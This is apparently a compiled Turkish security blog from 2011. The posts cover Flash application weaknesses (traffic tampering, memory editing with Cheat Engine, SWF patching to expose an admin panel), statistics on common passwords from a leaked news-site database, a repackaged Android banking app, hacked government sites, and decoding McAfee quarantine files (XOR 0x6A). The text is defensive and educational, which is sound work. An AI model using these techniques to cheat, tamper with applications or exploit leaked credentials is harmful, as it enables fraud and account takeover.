bull Zafiyet tarama araccedilları Actionscript programlama dilide guumlvenli bir şekilde kullanılmadığı taktirde XSS XSRF gibi zafiyetlereyol accedilabilmektedir Oumlzellikle URL kabul eden işleyen fonksiyonlarda ve HTML kullanılan parametrelerde bu zafiyetlere sıkccedilarastlayabiliriz Oumlrnek olarak Flash ile hazırlanmış olan reklamlarda kullanılan clickTAG değişkeni guumlvenli kullanılmadığı taktirdeXSS zafiyetine yol accedilabilmektedir Bu ve benzer sorunları tespit etmek iccedilin Actionscript kodunu detaylı olarak analiz etmek gerekirancak bu zaman alıcı bir iş ve ccediloğu kimse iccedilin uzmanlık gerektirebildiği iccedilin bunu gerccedilekleştiren programlardan faydalanabilirizHP SWFScan bu amaccedilla geliştirilmiş hedef SWF dosyasını tersine ccedilevirerek analiz eden ve 60dan fazla guumlvenlik zafiyetinitespit edebilen ve raporlayabilen faydalı bir araccediltır Aşağıdaki ekran goumlruumlntuumlsuumlne bakacak olursanız rastgele olarak seccedililmiş oumlrnekbir sitedeki SWF dosyasında yer alan XSS (cross-site scripting) guumlvenlik zafiyetini başarıyla tespit edebildiğini goumlrebilirsiniz(SWFScan Actionscript 2 ve 3 suumlruumlmlerini desteklemektedir 2 suumlruumlmuuml iccedilin ayrıca SWFIntruder aracınıda kullanabilirsiniz) Butuumlr araccedillar kimi zaman guumlvenlik zafiyetlerini tespit edemeyebilirler bu nedenle her ihtimale karşı actionscripti analiz etmekte yararolduğunu soumlyleyebilirim

44

Art niyetli kişilerin Flash uygulamalarınızı istismar etmesini zorlaştırmak iccedilin mutlaka action scriptinizi gizlemeli (obfuscation) Adobetarafından guumlvenli uygulama geliştirme oumlnerilerini dikkate almalı hafızaya muumldahale iccedilin saklanan değerleri kullanım sonrasında hemendeğiştirmeli ve trafiğe muumldahaleyi zorlaştırma adına sunucu ile uygulama arasındaki değerleri hashlemenizi tavsiye ederim

Bir sonraki yazıda goumlruumlşmek dileğiyle

Sunum dosyası Powerpoint suumlruumlmuuml

Ne Tuumlr Şifreler Kullanıyoruz Source httpswwwmertsaricacomne-tur-sifreler-kullaniyoruzBy MS on January 13th 2011

45

Geccediltiğimiz guumlnlerde yakın bir arkadaşımdan 34762 adet uumlyesi olan meşhur bir haber sitesine ait veritabanın yeraltı duumlnyasında eldenele gezdiğini oumlğrendim

Hack edilen veritabanları ahlaksız korsanlar iccedilin oldukccedila değerlidir ccediluumlnkuuml buradan elde ettikleri kişisel bilgiler sayesinde (e-posta isimsoyad şifre) bu kullanıcıların başka sistemler uumlzerinde (sosyal ağlar e-posta sistemleri vb) aynı şifreleri kullanıp kullanmadıklarınıkontrol ederek bu kullanıcılara ait daha fazla bilgiye ulaşmaya ccedilalışırlar Bunun altında yatan amaccedil kişisel bilgilerin satılması ile eldeedilecek kazanccediltır İşte bu yuumlzden her sistemde farklı şifre kullanılması oldukccedila oumlnemlidir

Hack edilen veritabanları ayrıca ahlaklı korsanlar ve sistem youmlneticileri iccedilinde oldukccedila değerlidir Mesela sistem youmlneticileri buveritabanlarında yer alan şifreleri analiz ederek tahmin edilmesi kolay olan şifreleri tespit edebilir ve youmlnettiği sistemlerde bu şifrelerinkullanılmasını yasaklayabilir Bu yaklaşımın amacı bir nevi şifre kara listesi oluşturmaktır bu sayede şifre politikalarına rağmen zayıfşifre kullanmaya meyilli olan kullanıcıların bu şifreleri kullanması engellenebilir

Ahlaklı korsanlar ise bu veritabanlarında yer alan bu şifreleri kendilerine guumlzel bir soumlzluumlk oluşturmak amacıyla kullanabilirler Bu soumlzluumlksayesinde izin alınmış hedef bir sisteme sızmak iccedilin gerccedilekleştirilen soumlzluumlk saldırılarının (dictionary attack) başarıya ulaşma ihtimaliyuumlkselir ve sistemdeki zayıf şifre kullanan kullanıcılar tespit edilerek olası bir ihlalin ve yaratacağı etkinin oumlnuumlne geccedililmiş olur Peki yaaynı youmlntemi ahlaksız korsanlarda izlerse ne olur Bu durumda herhangi bir sistem uumlzerinde zayıf şifre kullanan kullanıcıların hesaplarıkısa bir suumlre iccedilinde art niyetli kişilerin kontroluumlne geccediler ve kullanıcılar iccedilin kabus dolu guumlnler başlamış olur

Bu veritabanı ile karşılaşınca en ccedilok yurdum insanı guumlccedilluuml şifre kullanımı konusunda ne kadar bilinccedilli sorusuna cevap aramak istedimve grep cat sort uniq head wc gibi basit metin araccedilları ile işe koyuldum

Son kullanıcılar iccedilin guumlccedilluuml şifre politikası buumlyuumlk kuumlccediluumlk harflerden sayılardan oumlzel karakterlerden ve en az 8 karakterden oluşmalıdırduumlşuumlncesiyle bu politika ile uyumsuz olan şifreleri veritabanında aratmaya başladım

Tekil (uniq) şifrelerin sayısıcat passtxt | sort | uniq -ciu | wc -l

26123

En uzun şifrenin uzunluğucat passtxt | sort | uniq -ciu | wc -L

28

Sadece sayılardan oluşan 50 şifregrep -e ^[0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456103 111111

84 12312381 000000

73 123456789

65 666666

58 12345678

56 112233

39 121212

38 14531453

32 123654

29 654321

29 19031903

28 159753

25 19051905

25 123321

24 313131

46

22 131313

21 1234567

20 19881988

20 19871987

20 112358

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

17 222222

17 19861986

17 19841984

17 12341234

16 102030

15 159357

15 147852

14 7777777

13 333333

13 19901990

12 987654321

12 987654

12 852456

12 353535

12 252525

12 19851985

12 19801980

12 159951

12 12344321

12 12121212

12 010203

12 00000000

47

Sadece sayılardan oluşan tekil (unique) şifrelerin sayısıgrep -e ^[0-9]$ passtxt | sort | uniq -icu | wc -l

10842

Sadece harflerden oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -ic | sort r | head -n 50

115 (sitenin adı sansuumlrlendi)57 qwerty

47 sanane41 istanbul

34 ankara

30 password

30 parola

30 asdasd

26 galatasaray

26 besiktas

25 Fenerbahce

21 deneme

19 cimbom

17 qazwsx

16 portakal

16 kartal

14 asdfgh

12 aaaaaa

11 unuttum

11 merhaba

10 zeynep

10 malatya

10 hebele

9 yagmur

9 qweasd

9 kelebek

9 kanarya

9 hacettepe

8 penguen

8 mustafa

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 30: Hack 4 Career - 2011

30

Normal şartlarda 2 dakikada taranabilen bir sayfa 46 dakika sonunda halen taranmaya ve ziyaret edilecek URL (resimde sol alt koumlşeyedikkat) sayısı artmaya devam ediyor (doumlnguuml)

31

Benzer sorun diğer ticari web uygulaması guumlvenlik tarayıcılarında var mı diyerek Netsparker ve Acunetix araccedillarına baktığımda bununAppscane oumlzguuml bir sorun olduğu ve bunun yanında başka bir sorun daha dikkatimi ccedilekti Misal ekran goumlruumlntuumllerinde yer alan JSklasoumlruumlnuumln aslında geccedilerli var olan bir klasoumlr olmamasına rağmen Appscan ve Acunetix araccedilları Netsparkerın aksine site haritalarınavar olmayan klasoumlrleri ekleyerek goumlruumlntuuml kirliliği yaratmakta ve site haritasının kullanımını zorlaştırmaktalar

Sonuccedil olarak sitenizin bu tuumlr otomatik araccedillar ile taranmasından rahatsız oluyorsanız bu araccedilları inceleyerek zayıf noktalarını keşfedebilirve site keşfini zorlaştıracak basit numaralara ile script kiddieleri canlarından bezdirebilirsiniz )

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi haftasonları dilerim

Not Uumlretilen bağlantı adreslerine benim yaptığım gibi isim (link text) vermez iseniz kullanıcıların yanlışlıkla bu bağlantı adreslerinetıklamasını engelleyebilirsiniz

Devletrsquoin Sitesi DenizhellipSource httpswwwmertsaricacomdevletin-sitesi-denizBy MS on February 20th 2011

Bilenleriniz bilirler geccediltiğimiz ay Bilgi Teknolojileri ve İletişim Kurumu (BTK) ve TUumlBİTAKın kurum ve kuruluşların bilgisistemlerine youmlnelik siber saldırılara karşı savunma guumlcuumlnuuml tespit etmek iccedilin Ulusal Siber Guumlvenlik Tatbikatı duumlzenledi ve 4guumln boyunca suumlren bu tatbikatta BTK ve TUumlBİTAK tarafından oluşturulan ekip 41 kamu ve oumlzel sektoumlr kurumkuruluşunun bilgisistemlerine gerccedilek saldırılar duumlzenledi

Bir yanda ulusal siber guumlvenlik tatbikatı duumlzenlene dursun diğer yanda vatandaşlarımızın her guumln ziyaret ettiği ve bilgi paylaşımındabulunduğu honeypot gibi kurulan ve youmlnetilen onlarca devlet sitesi art niyetli kişiler tarafından gerccedilek saldırılara maruz kalmakta vebu sitelersistemler uumlzerinde saklanan veriler art niyetli kişilerin eline geccedilmektedir

Duumlnya genelinde hack edilen sitelerin arşivini (kendilerine bildirilmesi kaydıyla) tutan Zone-H sitesine goumlz atacak olursanız kimi zamanguumlnde onlarca govtr uzantılı devlet sitemizin hack edildiğini goumlrebilirsiniz Zaman zaman bu siteye goumlz atan biri olarak geccediltiğimiz ayEnerji ve Tabii Kaynaklar Bakanlığına ait olan wwwenerjigovtr sitesinin youmlnetici panelinin hack edildiğine dair bir giriş goumlrduumlm veduyarlı bir vatandaş olarak 24 Ocak tarihinde hemen TR-BOME ekibine (bilgisayar olaylarına muumldahale ekibi) web siteleri uumlzerinden

32

durumu bildirdim Olayın en kısa suumlrede ccediloumlzuumllmesi iccedilin Enerji ve Tabii Kaynaklar Bakanlığı ile iletişime geccedilmek yerine TR-BOMEile iletişime geccedilmeyi tercih etmeme rağmen halen youmlnetici panelinin internete accedilık ve erişilebilir olmasının bir vatandaş olarak beniuumlzduumlğuumlnuuml soumlylemek isterim

Zone-H sitesi uumlzerinden elde ettiğim bilgiler ışığında hack edilen devlet sitelerimiz ile ilgili istatistiki bilgileri bir araya getirecekolursam

bull 10032010 - 16022011 Zone-He bildirilmiş hack edilen devlet sitelerinin sayısı 1250

bull 2010 yılının Mart ayında 50 Nisan ayında 72 Mayıs ayında 396 Haziran ayında 67 Temmuz ayında 86 Ağustoz ayında 77 Eyluumll ayında 118 Ekim ayında 72 Kasım ayında 59 Aralık ayında 85 devlet sitesi hack edilmiş

bull 2011 yılının Ocak ayında 88 ve Şubat ayının yarısında ise 80 devlet sitesi hack edilmiş

bull Hack edilen 1250 devlet sitesinden 536 tanesi Linux 320 tanesi Windows 2003 333 tanesi Windows 2008 31 tanesi Windows2000 7 tanesi Unix işletim sistemi uumlzerinde barındırılıyormuş

Boumlyle vahim bir tablo karşısında devletin kendi kaynakları ile (Tuumlbitak) sitelerini iccedil ve dış tehditlere karşı acil olarak denetlemesigerekirken geccediltiğimiz ay Bankacılık Duumlzenleme ve Denetleme Kurumu (BDDK) 49 bankadan Tuumlbitaka 6 ay iccedilinde sızma testiyaptırmasını talep etti Bir yanda honeypot haline gelmiş devlet sitelerinin iccediller acısı hali diğer bir yanda guumlvenlik kontrollerinin ccedilok sıkıolduğu ve senede bir ccedilok defa iccedil ve dış guumlvenlik denetimlerinden geccedilen bankaların ilave olarak devlet kaynakları ile de denetlenmesiyorumu sizlere bırakıyorum

Bir sonraki yazıda goumlruumlşmek dileğiyle

Virusscan BUP Restore UtilitySource httpswwwmertsaricacomvirusscan-bup-restore-utilityBy MS on February 12th 2011

Bana goumlre korsanların (konumuz her zamanki gibi etik olanlar) başarılı olabilmeleri iccedilin yuumlksek hayal guumlcuumlne ve yaratıcı zekaya sahipolmaları gerekmektedir Karşılaştıkları engelleri aşmak ve başarıya ulaşmak iccedilin uumlretecekleri senaryolar hayal guumlccedilleri ile bu senaryolarıhayata geccedilirmeleri ise yaratıcılıkları ile muumlmkuumln olabilmektedir Nedense hayal guumlcuuml ile zafiyet keşfetme becerisini yaratıcılık ile iseprogramlama becerisini oumlrtuumlştuumlrmuumlşuumlmduumlr ve bu yuumlzden etik bir korsan olarak bu becerilerimi geliştirmek iccedilin zaman zaman senaryolaruumlreti zaman zamanda karşıma ccedilıkan fırsatları değerlendirmeye ccedilalışırım

Yine guumlnlerden bir guumln şuumlpheli bir duruma karşı kullanıcılardan gelen antivirus alarmlarına goumlz atarken kullanıcılardan gelen fazlasayıda alarm dikkatimi ccedilekti Zararlı yazılım analizinden oldukccedila keyif alan kahramanımız Mert fırsat bu fırsat Jedi duyuları ile hareketederek alarmların kaynağını aramaya koyuldu ve alarmların arkasında bu kullanıcıların ortak olarak ziyaret ettiği bir web sitesi olduğuanlaşıldı Web sitesini ziyaret eden kahramanımızın antivirus programı da aynı alarmı verince dosya uumlzerinde detaylı bir analiz yaptıktandurumun yanlış alarmdan (false positive) ibaret olduğunu anladı ve adli bilişim analizi yapma hevesi kursağında kaldı

Peki ya durum biraz daha farklı olsaydı Kahramanımızın kullandığı antivirus yazılımı Mcafee Virusscan olsaydı ve Virusscan tespitettiği zararlı yazılımları karantinaya alıyor olsaydı ayrıca kahramanımızın antivirus uumlzerindeki yetkileri (dosyayı karantinadan ccedilıkarmayetkisi) kısıtlı olsaydı bu durumda ne yapması gerekirdi

Antivirus sistemini youmlneten kişiden ilgili dosyayı restore etmesini ve analiz iccedilin kendisine iletmesini talep edebilir (e-posta ve telefontrafiği) veya sanal makine iccedilindeki işletim sistemine Virusscan kurabilir ve onun uumlzerinde restore edebilir (oumllme eşeğim oumllme) veyakarantina mekanizmasının nasıl ccedilalıştığını tersine muumlhendislik ile ccediloumlzerek bunu otomatize hale getiren bir araccedil hazırlayabilir (bildiğimkararıyla piyasada boumlyle bir araccedil yok veya ben aradığım zaman yoktu) ve yeri geldiğinde bunu adli bilişim analizlerinde kullanılabilirdi(hedef diskten karantinaya alınmış dosyaları kopyalamak ve incelemek size guumlzel ipuccedilları verebilir şayet analize elverişli biccedilimde disklesaklanmış ise)

Karantina işleminin nasıl yapıldığından kısaca bahsedece olursak Virusscan karantinaya aldığı dosyayı CQUARANTINE klasoumlruumlnefarklı bir ad altında kopyalamakta ve uzantı olarak BUP kullanmaktadır (Oumlrnek 7db11a1031283c50bup) Karantinaya alınanbir dosyayı herhangi bir hex editoumlruuml ile inceleyecek olursanız iccedileriğin ve dosya boyutunun orjinalinden farklı olduğunu anlamlıkarakterlerden oluşan diziler (string) ortadan kaybolmuş olduğunu goumlrebilirsiniz

33

Karantina mekanizmasının nasıl ccedilalıştığını hızlıca anlamaya ccedilalıştığımda karantinaya alınan ve BUP uzantısı ile saklanan dosyanın j(hex 6A) karakteri ile XOR işleminden geccedilirildiğini anlamam ccedilok zor olmadı

34

Hex Workshop ile karantinaya alınmış dosyayı 6A ile XOR işleminden geccedilirdikten sonra ortaya anlamlı karakterler oluşan dizilerccedilıkıverdi

35

Orjinal dosya ile XOR işleminden geccedilirilmiş dosyayı karşılaştırdığımda XORlanmış dosyanın ilk 2560 baytında detaylı bilgiler (orjinaldosyanın adı karantinaya alınma tarihi virusun adı vs) saklandığını goumlrduumlm Daha sonrasında ise programın orjinali saklanıyordu(Tam olarak orjinali diyemiyorum ccediluumlnkuuml her 65536 baytta bir 512 bayt buumlyuumlkluumlğuumlnde ccediloumlp veri araya (junk) sokuşturulmuş ve bunlarıayıklamam gerekti)

Hem detaylı bilgileri goumlsteren hem de karantinaya alınmış olan dosyayı orjinal haline ccedileviren bir program hazırlamak iccedilin işekoyulduğumda ortaya bup_recoverypy aracı ccedilıktı

36

Program iki komut (restore ve view) ile ccedilalışıyor ve kullanımı yine ccedilok basit İlk olarak yapmanız gereken karantinaya alınmış dosya ilebup_recoverypy programını aynı klasoumlre kopyalamanız Restore komutu ile hem detaylı bilgileri goumlrebilir hem de karantinaya alınmışprogramı orjinal haline ccedilevirebilirsiniz View komutu ile sadece detaylı bilgileri goumlrebilirsiniz

Oumlrnek bup_recoverypy restore 7db11a1031283c50bup

Programı buradan indirebilirsiniz

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi hafta sonları dilerim

Not Zaman zaman senaryolarımda Mcafee antivirus yazılımına yer veriyor olmamın nedeni uzun yıllarca kullanmış olmamdır başkabir nedeni yoktur )

Hackerlarrsquoın Goumlzuumlnden Flash UygulamalarıSource httpswwwmertsaricacomhackerlarin-gozunden-flash-uygulamalariBy MS on January 30th 2011

Ah o Netsec etkinliğinde bende olsaydım deyipte katılamayanlar iccedilin yapmış olduğum sunumu kısaca yazıya doumlkmeye karar verdim

Oumln bilgi olarak Flash kısaca web sayfalarına animasyon video ve etkileşim eklemek amacıyla kullanılan ve Actionscript adında nesneyoumlnelimli (object oriented) programlama dili iccedileren bir multimedya platformudur Flash uygulamalarına ccediloğunlukla reklamlarda veoyunlarda rastlarız Flash dosyaları ccediloğunlukla SWF (ShockWave Flash) formatında olur ve aslında bir sanal makine olan Flash oynatıcısıtarafından ccedilalıştırılır Flash oynatıcısının bir sanal makine olması sayesinde SWF formatındaki bu dosyalar her platformda ccedilalıştırılabilirDurum boumlyle olunca Javada da olduğu gibi SWF formatındaki bir dosya kolaylıkla baytkoddan (bytecode) kaynak koduna ccedilevrilebilir(decompile) Actionscript ilk olarak animasyonları kontrol etmek iccedilin tasarlanmıştır fakat geliştirilen yeni suumlruumlmleri ile web tabanlıoyunlardan goumlruumlntuuml ve ses yayını yapmaya imkan tanıyan zengin internet uygulamaları geliştirilebilmesine imkan tanımaktadır veJavascript ile aynı kodlama imlasına (syntax) sahiptir Actionscriptin 2 suumlruumlmuuml Flash oynatıcı 8 ve oumlncesi suumlruumlmlerde 3 suumlruumlmuuml ise9 ve sonrası suumlruumlmlerde ccedilalışmaktadır

Aralık 2010 yılında Millward Brown tarafından gerccedilekleştirilen ankete goumlre Adobe Flash oynatıcısı internet erişimi olan bilgisayarların99unda yuumlkluumlymuumlş Anket bir yana zaten guumln iccedilinde gezdiğimiz sitelerin iccedileriğine biraz daha dikkat edecek olursak ccediloğunda Flashile geliştirilmiş bir kısım olduğunu goumlrebiliriz Web uygulama guumlvenliğinde ccediloğunlukla Flash uygulama guumlvenliği goumlz ardı edilmekteve art niyetli kişilerin hedefi haline gelebilmektedir

Oumlrnek olarak Flash ile geliştirilmiş oyunları ele alarak art niyetli kişilerin ccediloğunlukla yoğunlaştığı noktalara kısa goumlz atalım

bull Flash oynatıcı ile sunucu arasında gerccedilekleşen trafiğin manipuumlle edilmesi Oumlzellikle Flash ile geliştirilmiş olan oyunlarda istemcitarafına guumlvenilerek kontrollerin istemci tarafında gerccedilekleştirilmesi sağlanmakta ve istemci tarafında işlenen veri sorgusuz sualsizsunucu tarafında işleme alınmaktadır Durum boumlyle oluncada oumlduumllluuml oyunlarda ve yarışmalarda bu durumu istismar eden hilecilerortaya ccedilıkmakta ve haksız kazanccedil sağlamaktadırlar Oumlrnek olarak aşağıdaki ekran goumlruumlntuumlsuumlnde yer alan oyunu inceleyecekolursanız sunucudan istemci tarafına sorulara ilave olarak yanıtların da goumlnderildiğini goumlrebilirsiniz Bu trafiği goumlrebilmek vegerekirse manipuumlle edebilmek iccedilin yapmanız gereken Burp Paros ve benzer proxy araccedilları ile internet tarayıcısı ile sunucusuarasına girmektir

37

38

bull Kaynak koduna ccedilevirme Az oumlncede bahsettiğim gibi baytkod olmasından oumltuumlruuml Flash uygulamalarını kaynak koduna 3 parti biraraccedil ile ccedilevirmek oldukccedila kolaydır bu nedenle uygulama iccediline statik kullanıcı adı ve şifre koymak doğru bir yaklaşım olmaz Aşağıdaki ekran goumlruumlntuumlsuuml bu hatayı goumlzler oumlnuumlne seren guumlzel bir oumlrnek olabilir

39

40

bull Hafızaya muumldahale etme Diğer tuumlm uygulamalarda olduğu gibi Flash uygulamaları tarafından kullanılan verilerin bir kısmıdahafızada saklanmaktadır Hafızaya muumldahale ederek uygulamanın akışını değiştirmek sahip olmadığınız bir yetkiye sahipolabilmek muumlmkuumln olabilir Oumlzellikle oyunlarda hafızaya muumldahale ederek guumlcuumlnuumlzuuml yuumlkseltmek veya sanal paranızı arttırmakhaksız kazanca yol accedilabilir Aşağıdaki ekran goumlruumlntuumlsuumlnde bu amaccedilla kullanılan Cheat Engine aracı ile bir Poker oyununda sahipolunan paranın nasıl yuumlkseltilebildiğini goumlrebilirsiniz Bunun iccedilin yapmanız gereken o an sahip olduğunuz paranın karşılığınıhafızada bulmak ve istediğiniz değer ile değiştirmektir

41

42

bull Tersine ccedilevirme(disassembling) Flash uygulamasına ait SWF dosyasını analiz etmek iccedilin kaynak koduna ccedileviremediğimizdurumlarda baytkodu okunabilir hale ccedilevirebilir ve analizimizi gerccedilekleştirebiliriz Analizle yetinmeyerek baytkoda muumldahaleedebilir ve SWF dosyasını yamayabiliriz Kaynak koduna ccedilevirdiğimiz ancak tekrar derleyemediğimiz durumlarda da bu yolabaşvurabiliriz Bu iki durumda da hem tersine ccedilevirme hem de yamama iccedilin RABCDasm aracından faydalanabilirsiniz Oumlrnekolarak bir oyun duumlşuumlnuumln kaynak koduna ccedilevirmek muumlmkuumln ve analiz neticesinde youmlnetim paneli SWF dosyasının iccedilinde yeralıyor ancak uygulamayı derleyenler tarafından bu youmlnetim paneline ulaşmak muumlmkuumln değil ccediluumlnkuuml bu actionscriptte yer alan vebu panel ile ilgili olan fonksiyon oyunun yuumlklenmesi esnasında goumlruumlnuumlr değil Ancak bu dosyayı tersine ccedilevirerek (disassembling)muumldahale edebilirseniz (patching) bu panelin yuumlklenme esnasında goumlruumlnuumlr hale gelmesini sağlayabilir ve youmlnetici panelineerişebilirsiniz İşte tam olarak bu durumu konu alan bir zafiyeti geccediltiğimiz aylarda kaşfederek oyunu geliştiren firma ile paylaştımve duumlzeltilmesini sağladım (Firma ccedilalışanlarının samimi 